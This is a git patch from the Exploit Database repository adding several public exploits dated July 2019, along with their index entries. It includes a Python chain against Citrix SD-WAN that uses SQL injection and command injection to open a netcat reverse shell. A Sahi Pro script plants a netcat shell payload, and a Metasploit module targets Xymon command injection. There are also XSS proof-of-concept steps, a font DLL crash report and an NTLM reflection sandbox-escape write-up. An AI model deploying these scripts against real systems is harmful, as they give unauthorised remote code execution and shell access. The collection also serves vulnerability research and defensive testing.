From 978c16266a187766ca23f39f3c1e3c6545e5ab9c Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 13 Jul 2019 05:02:17 +0000 Subject: [PATCH] DB: 2019-07-13 9 changes to exploits/shellcodes Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation Xymon 4.3.25 - useradm Command Execution (Metasploit) Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting Sahi Pro 8.0.0 - Remote Command Execution Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes) --- exploits/cgi/webapps/47112.py | 104 +++++++++++++++ exploits/hardware/webapps/47107.txt | 17 +++ exploits/java/webapps/47110.py | 92 ++++++++++++++ exploits/java/webapps/47111.txt | 39 ++++++ exploits/multiple/remote/47114.rb | 188 ++++++++++++++++++++++++++++ exploits/php/webapps/47109.txt | 64 ++++++++++ exploits/windows/dos/47113.txt | 62 +++++++++ exploits/windows/local/47115.txt | 64 ++++++++++ files_exploits.csv | 10 +- files_shellcodes.csv | 1 + shellcodes/linux_x86/47108.txt | 64 ++++++++++ 11 files changed, 704 insertions(+), 1 deletion(-) create mode 100755 exploits/cgi/webapps/47112.py create mode 100644 exploits/hardware/webapps/47107.txt create mode 100755 exploits/java/webapps/47110.py create mode 100644 exploits/java/webapps/47111.txt create mode 100755 exploits/multiple/remote/47114.rb create mode 100644 exploits/php/webapps/47109.txt create mode 100644 exploits/windows/dos/47113.txt create mode 100644 exploits/windows/local/47115.txt create mode 100644 shellcodes/linux_x86/47108.txt diff --git a/exploits/cgi/webapps/47112.py b/exploits/cgi/webapps/47112.py new file mode 100755 index 000000000..30e65008b --- /dev/null +++ b/exploits/cgi/webapps/47112.py @@ -0,0 +1,104 @@ +# Exploit Title: Citrix SD-WAN Appliance 10.2.2 Auth Bypass and Remote Command Execution +# Date: 2019-07-12 +# Exploit Author: Chris Lyne (@lynerc) +# Vendor Homepage: https://www.citrix.com +# Product: Citrix SD-WAN +# Software Link: https://www.citrix.com/downloads/citrix-sd-wan/ +# Version: Tested against 10.2.2 +# Tested on: +# - Vendor-provided .OVA file +# CVE: CVE-2019-12989, CVE-2019-12991 +# +# See Also: +# https://www.tenable.com/security/research/tra-2019-32 +# https://medium.com/tenable-techblog/an-exploit-chain-against-citrix-sd-wan-709db08fb4ac +# https://support.citrix.com/article/CTX251987 +# +# This code exploits both CVE-2019-12989 and CVE-2019-12991 +# You'll need your own Netcat listener + +import requests, urllib +import sys, os, argparse +import random +from OpenSSL import crypto +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +TIMEOUT = 10 # sec + +def err_and_exit(msg): + print '\n\nERROR: ' + msg + '\n\n' + sys.exit(1) + +# CVE-2019-12989 +# auth bypass via file write +def do_sql_injection(base_url): + url = base_url + '/sdwan/nitro/v1/config/get_package_file?action=file_download' + headers = { 'SSL_CLIENT_VERIFY' : 'SUCCESS' } + token = random.randint(10000, 99999) + json = { + "get_package_file": { + "site_name" : "blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_" + str(token) + "';#", + "appliance_type" : "primary", + "package_type" : "active" + } + } + + try: + r = requests.post(url, headers=headers, json=json, verify=False, timeout=TIMEOUT) + except requests.exceptions.ReadTimeout: + return None + + # error is expected + expected = {"status":"fail","message":"Invalid value specified for site_name or appliance_type"} + if (r.status_code == 400 and r.json() == expected): + return token + else: + return None + +# CVE-2019-12991 +# spawns a reverse shell +def do_cmd_injection(base_url, token, ncip, ncport): + cmd = 'sudo nc -nv %s %d -e /bin/bash' % (ncip, ncport) # + url = base_url + '/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % (token, cmd) + success = False + try: + r = requests.get(url, verify=False, timeout=TIMEOUT) + except requests.exceptions.ReadTimeout: + success = True + + # a timeout is success. it means we should have a shell + return success + +##### MAIN ##### + +desc = 'Citrix SD-WAN Appliance Auth Bypass and Remote Command Execution' +arg_parser = argparse.ArgumentParser(description=desc) +arg_parser.add_argument('-t', required=True, help='Citrix SD-WAN IP Address (Required)') +arg_parser.add_argument('-ncip', required=True, help='Netcat listener IP') +arg_parser.add_argument('-ncport', type=int, default=4444, help='Netcat listener port (Default: 4444)') + +args = arg_parser.parse_args() + +print "Starting... be patient. This takes a sec." + +# Path to target app +base_url = 'https://' + args.t + +# do sql injection to get a swc-token for auth bypass +token = do_sql_injection(base_url) +if (token is None): + err_and_exit('SQL injection failed.') + +print 'SQL injection successful! Your swc-token is ' + str(token) + '.' + +# if this worked, do the command injection +# create a new admin user and spawn a reverse shell +success = do_cmd_injection(base_url, token, args.ncip, args.ncport) + +if success is False: + err_and_exit('Not so sure command injection worked. Expected a timeout.') + +print 'Seems like command injection succeeded.' +print 'Check for your shell!\n' +print 'To add an admin web user, run this command: perl /home/talariuser/bin/user_management.pl addUser eviladmin evilpassword 1' \ No newline at end of file diff --git a/exploits/hardware/webapps/47107.txt b/exploits/hardware/webapps/47107.txt new file mode 100644 index 000000000..15b877da8 --- /dev/null +++ b/exploits/hardware/webapps/47107.txt @@ -0,0 +1,17 @@ +# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492 +# Exploit Author: ABDO10 +# Date : July, 11th 2019 +# Product : Tenda D301 v2 Modem Router +# version : v2 +# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/ +# Tested on: Linux +# CVE : 2019-13491 + + +# Poc Instructions : +/*******************************************************************************************************************/ +> 1 - Open modem router on web browser default(192.168.1.1) +> 2 - Click on advanced -> Wireless -> Security +> 3 - fill this payload : as password +> 4 - Click on "click to display" +/*******************************************************************************************************************/ \ No newline at end of file diff --git a/exploits/java/webapps/47110.py b/exploits/java/webapps/47110.py new file mode 100755 index 000000000..a01820f27 --- /dev/null +++ b/exploits/java/webapps/47110.py @@ -0,0 +1,92 @@ +# Exploit Title: Sahi Pro V8.0.0 - Unauthenticated Remote Command Execution +# Date: 2019-07-12 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: https://sahipro.com +# Software Link: https://sahipro.com/static/builds/pro/install_sahi_pro_v800_20181031.jar +# Reference: https://pentest.com.tr/exploits/Sahi-Pro-v8-x-Unauthenticated-RCE-Exploit-Python.html +# Version: 8.0.0 +# Category: Webapps +# Tested on: Linux 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux +# Description: Sahi allows you to run ".sah" scripts by Sahi Launcher. Also you can create a new script with editor. +# It is possible to execute commands on the server using the function "_execute()". +# This exploit creates a new sahi script that runs "netcat" on the server and opens a shell session. +# It can take 5-20 seconds to receive session. +# ================================================================== +# PoC: + +#!/usr/bin/python + +import sys, requests +import colorama, random, urllib +from colorama import Fore + +def bannerche(): + print ''' + @-------------------------------------------------------------@ + | Sahi Pro v8.x - Unauthenticated RCE Exploit | + | Vulnerability discovered by AkkuS | + | My Blog - https://pentest.com.tr | + @-------------------------------------------------------------@ + ''' +bannerche() + +def check_nc(rhost,lport): + choose = str(raw_input(Fore.RED + "+ [!] Do you listening "+rhost+" "+lport+" with netcat? (y/n): ")) + if choose == "n": + return False + else: + return True + +def execute_command(rhost,rport,filename): + runuri = "http://"+rhost+":"+rport+"/_s_/sprm/_s_/dyn/Player_setScriptFile" + runheaders = {"Connection": "close"} + rundata = "dir=%2Froot%2Fsahi_pro%2Fuserdata%2Fscripts%2F&file="+filename+"&starturl=&manual=0" + runsah = requests.post(runuri, headers=runheaders, data=rundata) + + if runsah.status_code == 200: + print (Fore.GREEN + "+ [*] Script was executed. Please wait for the session...") + else: + print (Fore.RED + "+ [X] Failed to run script.") + sys.exit() + +def create_sah(rhost,rport,scdir,lhost,lport): + + filename = ''.join(random.choice('abcdefghijklmnopqrstuvwxyz0123456789') for i in range(7)) + ".sah" + payload = "_execute%28%27nc+"+lhost+"+"+lport+"+-e+%2Fbin%2Fbash%27%29%0A" # it depends I used netcat for PoC + sahuri = "http://"+rhost+":"+rport+"/_s_/dyn/pro/EditorUI_saveScript?"+urllib.urlencode({ 'dir' : scdir})+"&file="+filename+"&contents="+payload+"" + saheaders = {"Connection": "close"} + sahreq = requests.get(sahuri, headers=saheaders) + + if sahreq.status_code == 200: + print (Fore.GREEN + "+ [*] "+filename+" script created successfully!") + execute_command(rhost,rport,filename) + else: + print (Fore.RED + "+ [X] Failed to create "+filename+" script.") + sys.exit() + +def main(): + + if (len(sys.argv) != 6): + print "[*] Usage: poc.py " + print "[*] -> Target IP" + print "[*] -> Target Port" + print "[*] -> Target Script Directory" + print "[*] -> Attacker IP" + print "[*] -> Attacker Port" + print "[*] Example: poc.py 192.168.1.2 9999 /root/sahi_pro/userdata/scripts/ 192.168.1.9 4444" + exit(0) + + rhost = sys.argv[1] + rport = sys.argv[2] + scdir = sys.argv[3] + lhost = sys.argv[4] + lport = sys.argv[5] + + if not check_nc(rhost,rport): + print (Fore.RED + "+ [*] Please listen to the port required for the session and run exploit again!") + else: + create_sah(rhost,rport,scdir,lhost,lport) + +if __name__ == "__main__": + main() \ No newline at end of file diff --git a/exploits/java/webapps/47111.txt b/exploits/java/webapps/47111.txt new file mode 100644 index 000000000..0ad498026 --- /dev/null +++ b/exploits/java/webapps/47111.txt @@ -0,0 +1,39 @@ +# Exploit Title: Persistent XSS - Dependency Graph View Plugin(v0.13) +# Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin +# Exploit Author: Ishaq Mohammed +# Contact: https://twitter.com/security_prince +# Website: https://about.me/security-prince +# Category: webapps +# Platform: Java +# CVE: CVE-2019-10349 +# Jenkins issue: #SECURITY-1177 + +1. Description: +The "Display Name" field in General Options of the Configure module in +Jenkins was found to be accepting arbitrary value which when loaded in the +Dependency Graph View module gets execute which makes it vulnerable to a +Stored/Persistent XSS. + +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10349 +2. Proof of Concept: +Vulnerable Source +http://{jenkins-hostname:port}/jobs/{projectname}/configure +Steps to Reproduce: +Login to Jenkins Server with valid credentials and ensure that the +dependency graph plugin is installed. +1. Click on configure the Jenkins plugin. +2. Select advanced options +3. Enter the XSS payload in the "Display Name" field +4. Navigate to Dependency Graph module +5. Observe the Executed Payload +6. Payload used for the demo: + + + +3. Solution: +As of publication of this advisory, there is no fix. +The plugin hsa been abandoned by the maintainer + + +Reference +https://jenkins.io/security/advisory/2019-07-11/#SECURITY-1177 \ No newline at end of file diff --git a/exploits/multiple/remote/47114.rb b/exploits/multiple/remote/47114.rb new file mode 100755 index 000000000..957abf33b --- /dev/null +++ b/exploits/multiple/remote/47114.rb @@ -0,0 +1,188 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Xymon useradm Command Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in Xymon + versions before 4.3.25 which allows authenticated users + to execute arbitrary operating system commands as the web + server user. + + When adding a new user to the system via the web interface with + `useradm.sh`, the user's username and password are passed to + `htpasswd` in a call to `system()` without validation. + + This module has been tested successfully on Xymon version 4.3.10 + on Debian 6. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Markus Krell', # Discovery + 'bcoles' # Metasploit + ], + 'References' => + [ + ['CVE', '2016-2056'], + ['PACKETSTORM', '135758'], + ['URL', 'https://lists.xymon.com/pipermail/xymon/2016-February/042986.html'], + ['URL', 'https://www.securityfocus.com/archive/1/537522/100/0/threaded'], + ['URL', 'https://sourceforge.net/p/xymon/code/7892/'], + ['URL', 'https://www.debian.org/security/2016/dsa-3495'] + ], + 'DisclosureDate' => '2016-02-14', + 'Platform' => %w(unix linux solaris bsd), + 'Targets' => + [ + [ + 'Unix CMD', + { + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Payload' => { + 'Space' => 2048, + 'BadChars' => "\x00\x0A\x0D", + 'DisableNops' => true, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl python netcat php' + } + } + } + ], + [ + 'Linux', + { + 'Platform' => 'linux', + 'Arch' => [ARCH_X86,ARCH_X64], + } + ], + [ + 'Solaris', + { + 'Platform' => 'solaris', + 'Arch' => [ARCH_X86] + } + ], + [ + 'BSD', + { + 'Platform' => 'bsd', + 'Arch' => [ARCH_X86, ARCH_X64] + } + ] + ], + 'Privileged' => false, + 'DefaultTarget' => 0)) + register_options([ + OptString.new('TARGETURI', [ + true, 'The base path to Xymon secure CGI directory', '/xymon-seccgi/' + ]), + OptString.new('USERNAME', [true, 'The username for Xymon']), + OptString.new('PASSWORD', [true, 'The password for Xymon']) + ]) + end + + def user + datastore['USERNAME'] + end + + def pass + datastore['PASSWORD'] + end + + def check + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'useradm.sh'), + 'authorization' => basic_auth(user, pass) + }) + + unless res + vprint_status "#{peer} - Connection failed" + return CheckCode::Unknown + end + + if res.code == 401 + vprint_status "#{peer} - Authentication failed" + return CheckCode::Unknown + end + + if res.code == 404 + vprint_status "#{peer} - useradm.sh not found" + return CheckCode::Safe + end + + unless res.body.include?('Xymon') + vprint_status "#{peer} - Target is not a Xymon server." + return CheckCode::Safe + end + + version = res.body.scan(/>Xymon ([\d\.]+)= Gem::Version.new('4.3.25') + return CheckCode::Safe + end + + CheckCode::Appears + end + + def execute_command(cmd, opts = {}) + res = send_request_cgi({ + 'uri' => normalize_uri(target_uri.path, 'useradm.sh'), + 'method' => 'POST', + 'authorization' => basic_auth(user, pass), + 'vars_post' => Hash[{ + 'USERNAME' => "';#{cmd} & echo '", + 'PASSWORD' => '', + 'SendCreate' => 'Create' + }.to_a.shuffle] + }, 5) + + return if session_created? + + unless res + fail_with(Failure::Unreachable, 'Connection failed') + end + + if res.code == 401 + fail_with(Failure::NoAccess, 'Authentication failed') + end + + unless res.code == 500 + fail_with(Failure::Unknown, 'Unexpected reply') + end + + print_good "#{peer} - Payload sent successfully" + + res + end + + def exploit + unless [Exploit::CheckCode::Detected, Exploit::CheckCode::Appears].include?(check) + fail_with Failure::NotVulnerable, 'Target is not vulnerable' + end + + if payload.arch.first == 'cmd' + execute_command(payload.encoded) + else + execute_cmdstager(linemax: 1_500) + end + end +end \ No newline at end of file diff --git a/exploits/php/webapps/47109.txt b/exploits/php/webapps/47109.txt new file mode 100644 index 000000000..4556b8f30 --- /dev/null +++ b/exploits/php/webapps/47109.txt @@ -0,0 +1,64 @@ +# Exploit Title: MyT Project Management - User[username] Stored Cross Site +Scripting +# Exploit Author: Metin Yunus Kandemir (kandemir) +# Vendor Homepage: https://manageyourteam.net/index.html +# Software Link: https://sourceforge.net/projects/myt/files/latest/download +# Version: 1.5.1 +# Category: Webapps +# Tested on: Xampp for Windows +# Software Description : MyT is an extremely powerful project management +tool, and it's easy to use for both administrators and end-users with a +really intuitive structure. +# CVE : CVE-2019-13346 +================================================================== + +#Description: "User[username]" parameter has a xss vulnerability. Malicious +code is being written to database while user is creating process. +#to exploit vulnerability,add user that setting username as +"" malicious code. + + + +POST /myt-1.5.1/user/create HTTP/1.1 +Host: target +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://target/myt-1.5.1/user/create +Content-Type: multipart/form-data; +boundary=---------------------------1016442643560510919154680312 +Content-Length: 3921 +Cookie: PHPSESSID=bp16alfk843c4qll0ejq302b2j +Connection: close +Upgrade-Insecure-Requests: 1 + +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[username]" + + +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[password]" + +12345 +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[password_confirm]" + +12345 +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[email]" + +ad1@gmail.com +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[name]" + + +-----------------------------1016442643560510919154680312 +Content-Disposition: form-data; name="User[surname]" + + +. +..snip +..snip +. \ No newline at end of file diff --git a/exploits/windows/dos/47113.txt b/exploits/windows/dos/47113.txt new file mode 100644 index 000000000..c141923f0 --- /dev/null +++ b/exploits/windows/dos/47113.txt @@ -0,0 +1,62 @@ +-----=====[ Background ]=====----- + +The Microsoft Font Subsetting DLL (fontsub.dll) is a default Windows helper library for subsetting TTF fonts; i.e. converting fonts to their more compact versions based on the specific glyphs used in the document where the fonts are embedded. It is used by Windows GDI and Direct2D, and parts of the same code are also found in the t2embed.dll library designed to load and process embedded fonts. + +The DLL exposes two API functions: CreateFontPackage and MergeFontPackage. We have developed a testing harness which invokes a pseudo-random sequence of such calls with a chosen font file passed as input. This report describes a crash triggered by a malformed font file in the fontsub.dll code through our harness. + +-----=====[ Description ]=====----- + +We have encountered the following crash in fontsub!ComputeFormat4CmapData: + +--- cut --- +(284c.42b4): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +FONTSUB!ComputeFormat4CmapData+0x1e5: +00007fff`aa44d295 41897cc304 mov dword ptr [r11+rax*8+4],edi ds:0000013d`775e8003=???????? + +0:000> ? r11 +Evaluate expression: 1363507314687 = 0000013d`775e7fff + +0:000> ? rax +Evaluate expression: 0 = 00000000`00000000 + +0:000> ? edi +Evaluate expression: 1 = 00000000`00000001 + +0:000> !heap -p -a r11 + address 0000013d775e7fff found in + _DPH_HEAP_ROOT @ 13d77571000 + in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize) + 13d77572e38: 13d775e7fff 1 - 13d775e7000 2000 + 00007fffcf6530df ntdll!RtlDebugAllocateHeap+0x000000000000003f + 00007fffcf60b52c ntdll!RtlpAllocateHeap+0x0000000000077d7c + 00007fffcf59143b ntdll!RtlpAllocateHeapInternal+0x00000000000005cb + 00007fff9b90be42 vrfcore!VfCoreRtlAllocateHeap+0x0000000000000022 + 00007fffcca398f0 msvcrt!malloc+0x0000000000000070 + 00007fffaa44fd1e FONTSUB!Mem_Alloc+0x0000000000000012 + 00007fffaa448d1d FONTSUB!MergeFormat4Cmap+0x0000000000000261 + 00007fffaa449788 FONTSUB!MergeCmapTables+0x00000000000004d4 + 00007fffaa44b046 FONTSUB!MergeFonts+0x00000000000005a6 + 00007fffaa44baac FONTSUB!MergeDeltaTTF+0x00000000000003ec + 00007fffaa4414b2 FONTSUB!MergeFontPackage+0x0000000000000132 +[...] + +0:000> k + # Child-SP RetAddr Call Site +00 0000000c`654fd180 00007fff`aa448e11 FONTSUB!ComputeFormat4CmapData+0x1e5 +01 0000000c`654fd1e0 00007fff`aa449788 FONTSUB!MergeFormat4Cmap+0x355 +02 0000000c`654fd2e0 00007fff`aa44b046 FONTSUB!MergeCmapTables+0x4d4 +03 0000000c`654fd3c0 00007fff`aa44baac FONTSUB!MergeFonts+0x5a6 +04 0000000c`654fd570 00007fff`aa4414b2 FONTSUB!MergeDeltaTTF+0x3ec +05 0000000c`654fd6b0 00007ff6`1a8a8a30 FONTSUB!MergeFontPackage+0x132 +[...] +--- cut --- + +The root cause of the crash seems to be the fact that the MergeFormat4Cmap() function may allocate a 0-sized buffer and pass it to ComputeFormat4CmapData() in the second argument, but the ComputeFormat4CmapData() function assumes that the buffer is at least 8 bytes long, and unconditionally writes two 32-bit values of -1 and 1 into it. + +The issue reproduces on a fully updated Windows 10 1709; we haven't tested earlier versions of the system. In order to observe the crash, the PageHeap feature must be enabled in Application Verifier for the FontSub client process, preferably with the "/unaligned" and "/size 0 1" options. Attached are 3 proof of concept malformed font files which trigger the crash. + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47113.zip \ No newline at end of file diff --git a/exploits/windows/local/47115.txt b/exploits/windows/local/47115.txt new file mode 100644 index 000000000..b1cbe455d --- /dev/null +++ b/exploits/windows/local/47115.txt @@ -0,0 +1,64 @@ +VULNERABILITY DETAILS +It's possible to use the NTLM reflection attack to escape a browser sandbox in the case where the +sandboxed process is allowed to create TCP sockets. In particular, I was able to combine the issues +mentioned below with a bug in Chromium to escape its sandbox. + +## HTTP -> SMB NTLM reflection +This is a long known attack that was described, for example, in +https://bugs.chromium.org/p/project-zero/issues/detail?id=222. As far as I can tell, MS16-075 was +supposed to to fix it by blocking attempts to reflect NTLM authentication operating in the same +machine mode (not sure about the actual internal term for that). However, it's still possible to +reflect NTLM authentication that works in the regular remote mode, and an attacker can force the +parties to use the remote mode, for example, by clearing the NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED +flag in the initial NEGOTIATE_MESSAGE message. + +In the actual exploit, a compromised sandboxed process acts as both a web server and an SMB client, +and asks the browser to visit http://localhost:[fake_webserver_port]. The browser receives an NTLM +authentication request and considers the `localhost` domain to be safe to automatically log on with +the current user's credentials. The sandboxed process forwards the corresponding packets to the +local SMB server. + +The problem here is that since the established session is considered remotely authenticated, it's +not allowed to access administrative shares unless the browser process runs at the high integrity +level. Therefore, another bug is required to gain file system access. + +## Insufficient path check in EFSRPC +The Encrypting File System Remote Protocol is a Remote Procedure Call interface that is used to +manage data objects stored in an encrypted form. It supports backing up and restoring files over +SMB, among other things. Functions like `EfsRpcOpenFileRaw` implement security checks, i.e., they +forbid remote users to pass regular file paths. However, if the attacker passes a UNC path of the +form `\\localhost\C$\...`, `lsass.exe` will initiate a new SMB connection while impersonating the +calling user, but this time using the same machine mode authentication; therefore it will be +permitted to access the C$ share. + +The exploit saves the payload on the user's disk (the easiest way might be just to force it to be +auto-downloaded as a .txt file) and calls the EFSRPC methods to copy it as an .exe file to the +user's Startup folder. + +There's also another path check bypass that has been found by James Forshaw. `EfsRpcOpenFileRaw` +accepts file paths starting with `\\.\C:\...`, presumably thinking that it's a UNC path since it +starts with two back-slashes. Please note that this variant also works in the case where a regular +user's credentials are relayed to another machine in a domain, so it might have wider security +implications. + +It's also worth mentioning that the `efsrpc` named pipe might not be enabled by default, but the +same RPC endpoint is available on the `lsass` named pipe with UUID +[c681d488-d850-11d0-8c52-00c04fd90f7e]. + +REPRODUCTION CASE +The proof-of-concept is based on [impacket](https://github.com/SecureAuthCorp/impacket/). It's a +collection of Python classes that supports working with SMB and MSRPC. +1. Run `start.cmd`, which downloads impacket from Github, applies the patch, and starts the server. +2. Open http://localhost/ in a Chromium-based browser. +3. You should see a new .exe file appearing on your desktop. + +VERSION +Microsoft Windows [Version 10.0.17134.648] + +REFERENCES +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nlmp/b38c36ed-2804-4868-a9ff-8dd3182128e4 +https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/08796ba8-01c8-4872-9221-1000ec2eff31 + + +Proof of Concept: +https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47115.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dece5592c..3e592b65a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6506,6 +6506,7 @@ id,file,description,date,author,type,platform,port 47101,exploits/windows/dos/47101.txt,"Microsoft DirectWrite / AFDKO - Multiple Bugs in OpenType Font Handling Related to the _post_ Table",2019-07-10,"Google Security Research",dos,windows, 47102,exploits/windows/dos/47102.txt,"Microsoft DirectWrite / AFDKO - NULL Pointer Dereferences in OpenType Font Handling While Accessing Empty dynarrays",2019-07-10,"Google Security Research",dos,windows, 47103,exploits/windows/dos/47103.txt,"Microsoft DirectWrite / AFDKO - Heap-Based Out-of-Bounds Read/Write in OpenType Font Handling Due to Empty ROS Strings",2019-07-10,"Google Security Research",dos,windows, +47113,exploits/windows/dos/47113.txt,"Microsoft Font Subsetting - DLL Heap Corruption in ComputeFormat4CmapData",2019-07-12,"Google Security Research",dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10586,7 +10587,8 @@ id,file,description,date,author,type,platform,port 47017,exploits/linux/local/47017.rb,"Cisco Prime Infrastructure - Runrshell Privilege Escalation (Metasploit)",2019-06-20,Metasploit,local,linux, 47070,exploits/macos/local/47070.rb,"Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)",2019-07-02,Metasploit,local,macos, 47072,exploits/linux/local/47072.rb,"Serv-U FTP Server - prepareinstallation Privilege Escalation (Metasploit)",2019-07-03,Metasploit,local,linux, -47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,mark,local,windows, +47105,exploits/windows/local/47105.py,"SNMPc Enterprise Edition 9/10 - Mapping Filename Buffer Overflow",2019-07-11,xerubus,local,windows, +47115,exploits/windows/local/47115.txt,"Microsoft Windows 10.0.17134.648 - HTTP -> SMB NTLM Reflection Leads to Privilege Elevation",2019-07-12,"Google Security Research",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17544,6 +17546,7 @@ id,file,description,date,author,type,platform,port 47073,exploits/windows/remote/47073.rb,"Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit)",2019-07-03,Metasploit,remote,windows,8080 47076,exploits/windows/remote/47076.py,"Microsoft Exchange 2003 - base64-MIME Remote Code Execution",2019-07-05,"Charles Truscott",remote,windows,25 47080,exploits/unix/remote/47080.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)",2019-07-07,"Brian Peters",remote,unix,80 +47114,exploits/multiple/remote/47114.rb,"Xymon 4.3.25 - useradm Command Execution (Metasploit)",2019-07-12,Metasploit,remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -41485,3 +41488,8 @@ id,file,description,date,author,type,platform,port 47075,exploits/php/webapps/47075.txt,"Karenderia Multiple Restaurant System 5.3 - Local File Inclusion",2019-07-05,"Mehmet EMIROGLU",webapps,php, 47078,exploits/php/webapps/47078.txt,"WordPress Plugin Like Button 1.6.0 - Authentication Bypass",2019-07-08,"Benjamin Lim",webapps,php,80 47106,exploits/aspx/webapps/47106.txt,"Sitecore 9.0 rev 171002 - Persistent Cross-Site Scripting",2019-07-11,"Owais Mehtab",webapps,aspx,443 +47107,exploits/hardware/webapps/47107.txt,"Tenda D301 v2 Modem Router - Persistent Cross-Site Scripting",2019-07-12,ABDO10,webapps,hardware,80 +47109,exploits/php/webapps/47109.txt,"MyT Project Management 1.5.1 - User[username] Persistent Cross-Site Scripting",2019-07-12,"Metin Yunus Kandemir",webapps,php,80 +47110,exploits/java/webapps/47110.py,"Sahi Pro 8.0.0 - Remote Command Execution",2019-07-12,AkkuS,webapps,java, +47111,exploits/java/webapps/47111.txt,"Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting",2019-07-12,"Ishaq Mohammed",webapps,java, +47112,exploits/cgi/webapps/47112.py,"Citrix SD-WAN Appliance 10.2.2 - Authentication Bypass / Remote Command Execution",2019-07-12,"Chris Lyne",webapps,cgi, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index f13582632..edd836b99 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -987,3 +987,4 @@ id,file,description,date,author,type,platform 47056,shellcodes/arm/47056.c,"Linux/ARM64 - Jump Back Shellcode + execve(_/bin/sh__ NULL_ NULL) Shellcode (8 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47057,shellcodes/arm/47057.c,"Linux/ARM64 - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Shellcode (48 Bytes)",2019-07-01,"Ken Kitahara",shellcode,arm 47068,shellcodes/linux_x86/47068.c,"Linux/x86 - execve(/bin/sh) using JMP-CALL-POP Shellcode (21 bytes)",2019-07-01,"Kirill Nikolaev",shellcode,linux_x86 +47108,shellcodes/linux_x86/47108.txt,"Linux/x86 - chmod 666 /etc/passwd & chmod 666 /etc/shadow Shellcode (61 bytes)",2019-07-12,"Xavier Invers Fornells",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/47108.txt 